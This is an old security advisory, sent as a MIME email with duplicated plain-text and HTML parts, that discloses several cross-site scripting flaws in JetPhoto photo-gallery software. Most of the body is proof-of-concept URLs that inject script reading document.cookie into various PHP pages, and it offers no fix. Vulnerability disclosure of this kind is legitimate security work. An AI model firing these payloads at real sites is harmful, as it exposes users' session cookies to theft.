------=_Part_14624_21669296.1144720328024 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline ########################################################################### # Advisory #11 Title: JetPhoto Multiple Cross-Site Scripting Vulnerabilitie # # # Author: 0o_zeus_o0 ( Arturo Z. ) # Contact: zeus@diosdelared.com # Website: www.elitemexico.org # Date: 10/04/06 # Risk: Medium # Vendor Url: http://www.jetphotosoft.com # Affected Software: JetPhoto # Non Affected: # #Info: ################################################################## #this bug consists of inserting script in the line of execution of # #the affected system causing the robbery of cookie # #Example XSS: ################################################################## # #http://www.vuln.com/[path]/view/Classic.view/thumbnail.php?name=3Dwebalbum= &page=3D # #http://www.vuln.com/[path]/view/Classic.view/thumbnail.php?name=3DJetPhoto= _Album&page=3D # #http://www.vuln.com/[path]/view/Classic.view/gallery.php?name=3DJetPhoto_A= lbum&page=3D # #http://www.vuln.com/[path]/view/Classic.view/detail.php?name=3DJetPhoto_Al= bum&page=3D # #http://www.vuln.com/[path]/view/Orange.view/slideshow.php?name=3D # #http://www.vuln.com/[path]/view/Orange.view/detail.php?name=3D1&page=3Dalert( document.cookie); # #http://www.vuln.com/[path]/view/Orange.view/detail.php?name=3D1&page=3Dalert( document.cookie); # ################################################################## # #Solution: ################################################################## # # #VULNERABLE VERSIONS ################################################################## #all # ################################################################## #Contact information #0o_zeus_o0 #zeus@diosdelared.com #www.elitemexico.org ################################################################## #greetz: lady fire,Mi beba, olimpus klan team and elitemexico # # original advisorie: http://www.elitemexico.org/11.txt ################################################################## ------=_Part_14624_21669296.1144720328024 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline ###########################################################################=
# Advisory #11 Title: JetPhoto Multiple Cross-Site Scripting Vulnerabil= itie
#
#
# Author: 0o_zeus_o0 ( Arturo Z. )
# Contact: zeus@diosdelared.com
# Website: www.elitemexico.org
# Date: 10/04/06
# Risk: Medium
# Vendo= r Url: http://www.jetphotosoft.com<= /a>
# Affected Software: JetPhoto
# Non Affected:
#
#Info:
###= ###############################################################
#this bu= g consists of inserting script in the line of execution of
#
#the af= fected system causing the robbery of cookie
#
#Example XSS:
################################################= ##################
#
#http://www.vuln.com/[path]/view/Classic.view/th= umbnail.php?name=3Dwebalbum&page=3D<script>alert(document.cookie)= ;</script>
#
#http://www.vuln.com/[path]/view/Classic.view/thumbnail.php?name= =3DJetPhoto_Album&page=3D<script>alert(document.cookie);</scri= pt>
#
#http://www.vuln.com/[path]/view/Classic.view/gallery.php?na= me=3DJetPhoto_Album&page=3D<script>alert( document.cookie);</script>
#
#http://www.vuln.com/[path]/view/C= lassic.view/detail.php?name=3DJetPhoto_Album&page=3D<script>alert= (document.cookie);</script>
#
#http://www.vuln.com/[path]/view/= Orange.view/slideshow.php?name=3D<script></script><script>= ;alert( document.cookie);</script>
#
#http://www.vuln.com/[path]/view/O= range.view/detail.php?name=3D1&page=3D<script>alert(document.cook= ie);</script>
#
#http://www.vuln.com/[path]/view/Orange.view/de= tail.php?name=3D1&page=3D<script>alert( document.cookie);</script>
#
##################################= ################################
#
#Solution:
####################= ##############################################
#
#
#VULNERABLE VER= SIONS
##################################################################
#= all
#
###############################################################= ###
#Contact information
#0o_zeus_o0
#zeus@
diosdelared.com
#www.elitemexico.org
############################= ######################################
#greetz: lady fire,Mi beba, olimp= us klan team and elitemexico
#
# original advisorie: http://www.elitemexico.org/11.txt
##################################= ################################ ------=_Part_14624_21669296.1144720328024--